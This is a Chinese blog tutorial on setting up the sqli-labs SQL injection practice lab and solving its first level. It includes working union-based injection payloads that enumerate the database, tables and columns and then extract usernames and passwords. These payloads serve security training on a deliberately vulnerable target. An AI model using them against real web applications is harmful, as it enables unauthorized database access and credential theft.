sql-labs通关教程

已于 2022-11-17 12:09:42 修改
阅读量802 收藏 3
点赞数
分类专栏: web基础漏洞 文章标签: sql 数据库
于 2022-10-30 22:53:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62274649/article/details/127603419
版权

上次我带大家了解了一下sql注入的一些内容,下面我们再来玩一下sqli_labs靶场。

##搭建

###普通安装

首先我们去github上下载sql-labs的源码

https://github.com/Audi-1/sqli-labs

进去以后点击download zip,把靶场的源码下载下来。

 然后解压把源码放进phpstudy的www目录下

 

 然后访问http://127.0.0.1/sqli-labs-master/出现这样的界面就代表已经安装成功了。

###docker搭建

当然我们也有更简单的方法,直接用docker安装

先查找一下sqli—labs的镜像

docker search sqli-lab 


docker pull acgpiano/sqli-labs

docker images


docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs

 

 这个时候我们也是安装成功了

##Less-1

首先判断注入点,id=1 and 1=1 和id =1 and 1 =2 都回显正常,说明不是数字型注入

接下来

id=1' and '1'='1

 回显正常

id= 1' and'1' ='2

回显出错

说明是字符型注入

二:看回显位置

 

到4的时候报错,说明只有三列

三:爆数据库

 四:查一下数据库

-1' union select1,2,database(); --+

发现数据库名是:security

五:查表名

?id=-1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+

 六:查字段

/?id=-1%27%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27--+

七:查数据

?id=-1' union select 1,2,group_concat(username) from security.users --+

查密码

/?id=-1' union select 1,2,group_concat(password) from security.users --+

就只是把username 改成password罢了

R3ality
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
sql-labs通关
whisper921的博客
03-05 9973
less 1—单引号字符型注入 字符型注入,单引号 通过随机输入id得知用户名和密码,网址后面接?id=1 判断 Sql 注入漏洞的类型:1.数字型 2.字符型 用 and 1=1 和 and 1=2 来判断: 1.Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。 2.Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 ,页面运行错误,则说明此 Sql 注入为数字型注入。 .
SQL 注入之 Windows/Docker 环境 SQLi-labs 靶场搭建!
最新发布
朱雀随云记的博客
04-07 1180
4、打开浏览器,输入“http://windows服务器ip/sqli-labs-master/” ,可以看到如下的界面,点击“Setup/reset Database for labs”,会出现Access denied的提示。3、执行:docker run -dt --name sqli-labs -p 81:80 --rm acgpiano/sqli-labs, 将镜像运行为容器。--name sqli-labs 将容器命名为sqli-labs。acgpiano/sqli-labs 镜像名。
sqllabs通关
m0_64674174的博客
10-24 526
主界面由于mysql_real_escape_string的过滤,将单引号,双引号等进行转义,无法进行注入,注册界面以及修改密码界面,由于注册界面以及修改密码见面的闭合方式不一样,可以达到二次注入的目的,创建。安装方法:解压到小皮面板的www的目录下,在sqllabs的sql-connections目录下的db-creds.inc文件,下图划横线位置设置自己的密码即可,从代码角度而言,可以很清楚的看出由单引号闭合,直接使用sql注入的一半流程即可,查询字段,判断回显,数据库——表——列,即可 为。
sql-labs 闯关
m0_73189964的博客
06-09 320
sql前22关靶场详解
sql-labs通关技巧
03-01
SQL注入常用靶场的通关技巧
SQL-labs/less1通关教程
02-29
参考了部分大佬的作品 原作链接:https://blog.csdn.net/qq_50808416/article/details/130623497
Upload-labs通关手册.pdf
08-06
Upload-labs通关手册
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqlilabs过关手册注入天书,过关sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sqllabs通关
xxxMIng的博客
12-28 924
sqli-labs通关 url编码:一般的url编码其实就是那个字符的ASCII值得十六进制,再在前面加个% 具体可以看http://www.w3school.com.cn/tags/html_ref_urlencode.html,这里可以查到每个字符的url编码,当然自己编程或者用该语言应该也有自带的函数,去实现url编码 常用的写出来吧: 空格是%20,单引号是%27, 井号是%23,双...
sqlilabs通关()
Forrest_bear的博客
05-24 986
就像以下代码一样:隔离空格。
Sqli-labs通关手册【1-30关】
李安北的博客
05-03 7113
1.sql注入的原理 1)sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
sqli-labs 通关日志 萌新向
春日野穹
11-16 1697
0x0 引言 sqli-labs是一个用来练习sql注入的平台,其内置集成了现存的各种sql注入,如盲注,联合查询注入等,对于新手来说它是一个十分不错的练习平台,我们可以使用它来进行各种注入尝试,从而提升我们的sql注入能力 萌新建议先看这个帖子再来做题:https://blog.csdn.net/chest_/article/details/102537988 目录快速导航 环境的搭...
sqli-labs通关-------04lesson-double_quotes
枯藤闲画云
05-31 281
到这个我们发现输入单引号和双引号好像都没啥反应http://127.0.0.1:90/sqli-labs/Less-4/?id=1’) ????????? 所以我们输入一个转义符进去,报错了。 为啥输入转移符 1.因为我碰到了输错了。。。。。 2.我发现好像换别的字符不行。。 3.so转移符可以进去把sql语句的字符串特殊字符转义,于是赶得巧了 ...
sqli-labs通关wp
D-R0s1的博客
04-11 6447
第一关: 方法一:在id=1后面加一个单引号后发现报错 然后把这个单引号注释掉试一下 使用'or 1=1--+ order by 查列数页面显示正常了。存在注入,先查一下列数 http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203--+ 使用单引号闭合掉一个单引号,在用--+或#或%27注释掉一个,便可以使中间的order...
SQL-labs通关合集及知识总结
qq_45584159的博客
12-19 1480
SQL-labs通关合集及知识总结 文章目录前言一、base challengeSQL注入基本知识: 前言 希望做完这个靶场对SQL注入和sqlmap有更加深入的理解。 一、base challenge SQL注入基本知识: 1.在MySQL中有这样一个数据库information_schema数据库,永安里存储数据库的元信息。 其中有三个表schemata(数据库名),tables(表名),columns(类名或字段名) 在schemata表中,schema_name字段用来存储数据库名。 在t
sqli-labs通关28
03-05
sqli-labs通关28中,你需要利用SQL注入漏洞来绕过登录验证,获取管理员权限。具体步骤如下: 1. 打开sqli-labs网站,找到通关28的页面。 2. 在登录框中输入任意用户名和密码,点击登录按钮。 3. 在URL中可以看到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

R3ality

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值